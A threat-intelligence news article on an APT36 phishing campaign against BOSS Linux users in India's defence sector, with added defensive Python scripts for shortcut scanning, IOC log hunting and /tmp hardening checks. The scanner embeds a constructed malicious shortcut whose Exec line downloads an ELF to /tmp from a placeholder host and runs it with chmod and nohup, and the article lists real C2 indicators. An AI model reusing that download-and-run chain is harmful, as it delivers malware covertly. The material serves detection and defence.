
APT36 Exploits BOSS Linux Systems Using Malicious ZIP Files to Harvest Confidential Information

The Indian defense sector is facing a new wave of targeted cyber espionage as threat intelligence firm CYFIRMA uncovers a sophisticated phishing campaign by the Pakistan-based group APT36, also known as Transparent Tribe.

The campaign represents a marked evolution in adversarial tactics, now targeting Linux platforms, specifically BOSS Linux, the Indian government’s preferred desktop operating system.

Phishing Emails Disguise Malicious Payloads

CYFIRMA’s analysis reveals that APT36 is distributing highly tailored phishing emails to Indian defense personnel.

The emails contain ZIP attachments, each housing a deceptive .desktop shortcut file labeled “Cyber-Security-Advisory.desktop”. Upon launch, this file kicks off a carefully layered attack sequence:

[Figure: Cyber-Security-Advisory]
  • The malicious .desktop file, disguised with a LibreOffice Impress icon, first downloads a seemingly legitimate PowerPoint file (“slide.pptx”). In reality, the file is an HTML page embedded with an iframe, tricking the user with a fake cybersecurity advisory.
  • While the user is distracted by the decoy, a concealed command silently downloads a Linux executable (“BOSS.elf”), which is then made executable and launched in the background using nohup, so that it keeps running even after the user logs out.

This multi-stage social engineering ploy allows the malware to bypass user suspicion and evade traditional antivirus defenses.
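The chain above lives entirely in the shortcut's Exec= line, which makes it something defenders can audit directly. The following script is an added example, not CYFIRMA's tooling: it parses freedesktop .desktop files with a minimal parser and flags a shortcut that downloads content and chains a chmod, nohup or scratch-directory path in a single command, plus the office-icon mismatch the report describes. The two sample shortcuts, the host example.invalid and the marker lists are constructed for the demonstration.

```python
import re
from pathlib import Path

# Added example, not CYFIRMA's tooling. It parses freedesktop .desktop shortcuts and
# flags the launch-time chain the article describes: a download utility, a chmod
# and a nohup (or a scratch directory such as /tmp) chained inside one Exec= line.
DOWNLOADERS = ("curl", "wget")
CHAIN_MARKERS = ("chmod", "nohup", "bash -c", "sh -c", "/tmp/", "/dev/shm/")
OFFICE_ICON_HINTS = ("libreoffice", "impress", "writer", "calc")

# Constructed sample modelled on the reported shortcut; example.invalid is a
# placeholder host, not an indicator from the report.
MALICIOUS_SAMPLE = """[Desktop Entry]
Type=Application
Name=Cyber-Security-Advisory
Icon=libreoffice-impress
Exec=bash -c "curl -s -o /tmp/slide.pptx http://example.invalid/slide.pptx; xdg-open /tmp/slide.pptx; curl -s -o /tmp/BOSS.elf http://example.invalid/BOSS.elf; chmod +x /tmp/BOSS.elf; nohup /tmp/BOSS.elf >/dev/null 2>&1 &"
Terminal=false
"""

# Constructed benign shortcut for comparison.
BENIGN_SAMPLE = """[Desktop Entry]
Type=Application
Name=LibreOffice Impress
Icon=libreoffice-impress
Exec=libreoffice --impress %U
Terminal=false
"""


def parse_desktop_entry(text):
    """Minimal parser: return the key/value pairs of the [Desktop Entry] group."""
    entry = {}
    in_group = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def analyze_desktop_entry(text):
    """Score one shortcut. Suspicious = downloads something AND chains a staging/launch step."""
    entry = parse_desktop_entry(text)
    exec_line = entry.get("Exec", "")
    findings = []
    downloads = any(re.search(rf"\b{tool}\b", exec_line) for tool in DOWNLOADERS)
    if downloads:
        findings.append("downloads content at launch")
    chained = [m for m in CHAIN_MARKERS if m in exec_line]
    findings.extend(f"chains {m!r}" for m in chained)
    icon = entry.get("Icon", "").lower()
    # Program actually launched: first word of Exec, basename only.
    first_word = exec_line.split(" ", 1)[0].rsplit("/", 1)[-1]
    if any(h in icon for h in OFFICE_ICON_HINTS) and first_word not in ("libreoffice", "soffice"):
        findings.append("office icon but Exec does not start an office application")
    return {
        "name": entry.get("Name", ""),
        "exec": exec_line,
        "findings": findings,
        "suspicious": downloads and bool(chained),
    }


def scan_directory(directory):
    """Analyse every *.desktop file under a directory; returns a list of results."""
    results = []
    for path in Path(directory).rglob("*.desktop"):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        result = analyze_desktop_entry(text)
        result["path"] = str(path)
        results.append(result)
    return results


if __name__ == "__main__":
    # Typical places a mailed shortcut ends up after the user unpacks the ZIP.
    for d in (Path.home() / "Desktop", Path.home() / "Downloads"):
        for r in scan_directory(d):
            if r["suspicious"]:
                print(f"SUSPICIOUS {r['path']}: {r['name']} -> {', '.join(r['findings'])}")
    # Built-in samples so the script demonstrates itself without any files on disk.
    for sample in (MALICIOUS_SAMPLE, BENIGN_SAMPLE):
        r = analyze_desktop_entry(sample)
        print(r["name"], "suspicious" if r["suspicious"] else "clean", r["findings"])
```

The rule deliberately requires both a download and a chaining marker before calling a shortcut suspicious, because plenty of legitimate launchers wrap a program in `sh -c`; the icon mismatch is reported separately as supporting context rather than as a verdict on its own.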

Technical Analysis – Data Theft and Stealth Tactics

The primary payload, “client.elf”, is a Go-based binary engineered for espionage. Once active, it profiles the victim’s system, gathering hostnames, CPU, and memory information, and scanning for files.

It leverages the “github.com/kbinani/screenshot” Go library to capture desktop screenshots, thereby enabling APT36 to harvest sensitive visual information covertly.

The malware establishes a persistent Command and Control (C2) connection to servers linked with the malicious domain “sorlastore.com” and the IP address 101.99.92.182, using non-standard network ports.

By chaining legitimate utilities like curl, chmod, and nohup within the .desktop file, the attackers evade traditional behavior-based detection.

Critically, the campaign’s Indicators of Compromise (IOCs) include specific file hashes, domains, and YARA rules, allowing defenders to update detection systems promptly.
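To show how the published network indicators turn into a hunt, here is an added example (not part of the CYFIRMA report) that runs the domain and IP named above over constructed DNS and connection log lines and also flags outbound connections to non-standard ports. The log format, the internal hosts, the timestamps, the 203.0.113.0/24 addresses and the "expected ports" list are all assumptions made for the demonstration; only sorlastore.com and 101.99.92.182 come from the article.

```python
import re

# Added example, not CYFIRMA's detection content. The two indicators below are the
# ones named in the report; everything else (log format, hosts, timestamps) is constructed.
IOC_DOMAINS = {"sorlastore.com"}
IOC_IPS = {"101.99.92.182"}
# Destination ports a desktop normally talks to; anything else outbound is "non-standard".
EXPECTED_PORTS = {80, 443, 53, 123, 25, 465, 587, 993, 995}

CONN_RE = re.compile(r"^(\S+) CONN (\S+) -> (\S+):(\d+) proto=(\w+)$")
DNS_RE = re.compile(r"^(\S+) DNS (\S+) query=(\S+)$")

# Constructed sample log; 203.0.113.0/24 is documentation address space.
LOG_LINES = [
    "2025-01-01T10:00:01Z DNS 10.0.0.5 query=sorlastore.com",
    "2025-01-01T10:00:02Z CONN 10.0.0.5 -> 101.99.92.182:8443 proto=tcp",
    "2025-01-01T10:00:03Z CONN 10.0.0.5 -> 203.0.113.10:443 proto=tcp",
    "2025-01-01T10:00:04Z DNS 10.0.0.7 query=cdn.sorlastore.com",
    "2025-01-01T10:00:05Z DNS 10.0.0.7 query=updates.example.org",
    "2025-01-01T10:00:06Z CONN 10.0.0.7 -> 203.0.113.20:9001 proto=tcp",
]


def domain_matches(name, iocs):
    """True if name equals an IOC domain or is a subdomain of one (case-insensitive)."""
    name = name.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in iocs)


def evaluate_line(line):
    """Return a finding dict for one log line, or None if nothing is notable."""
    m = DNS_RE.match(line)
    if m:
        ts, src, qname = m.groups()
        if domain_matches(qname, IOC_DOMAINS):
            return {"ts": ts, "src": src, "severity": "high",
                    "reason": f"DNS lookup of IOC domain {qname}"}
        return None
    m = CONN_RE.match(line)
    if m:
        ts, src, dst, port, proto = m.groups()
        port = int(port)
        if dst in IOC_IPS:
            return {"ts": ts, "src": src, "severity": "high",
                    "reason": f"connection to IOC address {dst}:{port}/{proto}"}
        if port not in EXPECTED_PORTS:
            return {"ts": ts, "src": src, "severity": "medium",
                    "reason": f"outbound to non-standard port {dst}:{port}/{proto}"}
    return None


def hunt(lines):
    """Run every line through evaluate_line and return the findings that fired."""
    return [f for f in map(evaluate_line, lines) if f]


def hosts_by_severity(findings, severity):
    """Distinct source hosts with at least one finding of the given severity."""
    return sorted({f["src"] for f in findings if f["severity"] == severity})


if __name__ == "__main__":
    for f in hunt(LOG_LINES):
        print(f"[{f['severity'].upper()}] {f['ts']} {f['src']}: {f['reason']}")
```

Exact indicator matches are rated high because they are tied to this campaign, while the non-standard-port rule is only medium: it will also catch legitimate software, so it is a triage signal to correlate with the .desktop findings rather than an alert on its own. Subdomain matching matters because the report lists a registered domain, and C2 hosts are often served from names beneath it.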

Heightened Security Urged for Indian Defense Sector

CYFIRMA recommends urgent action, including advanced email filtering, disabling automatic execution of unsafe file types, and enhanced user awareness training.

System hardening, such as restricting execution permissions in directories like /tmp and monitoring outbound traffic for C2 communication, is crucial.

Organizations should also integrate threat intelligence feeds and deploy endpoint detection tools tailored for Linux environments.
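The /tmp restriction is easy to verify on a fleet. The script below is an added example, not part of the report or of BOSS Linux: it parses /proc/mounts-style text, finds the mount that governs each scratch directory by longest-prefix match, and lists which of noexec, nosuid and nodev are missing. The sample mount table is constructed; on a real host the script reads /proc/mounts.

```python
# Added example, not from the report. It reads /proc/mounts-style text and reports which
# scratch directories lack the noexec/nosuid/nodev options the hardening advice points at.
# The sample mount table is constructed.
SAMPLE_MOUNTS = """\
/dev/sda2 / ext4 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,size=2G 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0
tmpfs /run tmpfs rw,nosuid,nodev,noexec,mode=755 0 0
"""

WANTED = ("noexec", "nosuid", "nodev")
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def parse_mounts(text):
    """Parse /proc/mounts lines into dicts; \\040 is how the kernel escapes a space."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        device, mountpoint, fstype, options = parts[:4]
        mounts.append({
            "device": device,
            "mountpoint": mountpoint.replace("\\040", " "),
            "fstype": fstype,
            "options": set(options.split(",")),
        })
    return mounts


def governing_mount(path, mounts):
    """Longest-prefix match: the mount whose mountpoint contains path."""
    best = None
    for m in mounts:
        mp = m["mountpoint"]
        if path == mp or mp == "/" or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best["mountpoint"]):
                best = m
    return best


def check_exec_hardening(mounts, dirs=SCRATCH_DIRS):
    """Map each scratch dir to the sorted list of hardening options it is missing."""
    report = {}
    for d in dirs:
        m = governing_mount(d, mounts)
        missing = sorted(set(WANTED) - m["options"]) if m else list(WANTED)
        report[d] = missing
    return report


if __name__ == "__main__":
    try:
        with open("/proc/mounts") as fh:
            text = fh.read()
    except OSError:
        text = SAMPLE_MOUNTS  # fall back to the constructed sample off-Linux
    for d, missing in check_exec_hardening(parse_mounts(text)).items():
        state = "ok" if not missing else "missing " + ",".join(missing)
        print(f"{d}: {state}")
```

In the sample, /var/tmp is not a mount of its own, so it inherits the root filesystem's options and comes back missing all three; that inheritance is exactly what a quick `mount | grep tmp` overlooks. Treat noexec as one layer: it only constrains binaries written under that mount point, so pair it with the outbound-traffic monitoring the report recommends.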

This campaign marks a significant leap in APT36’s capabilities, signaling a growing threat to government and critical infrastructure across India.

Vigilant monitoring and proactive defense remain essential as the adversary shifts its focus to the backbone systems of national security.

Priya
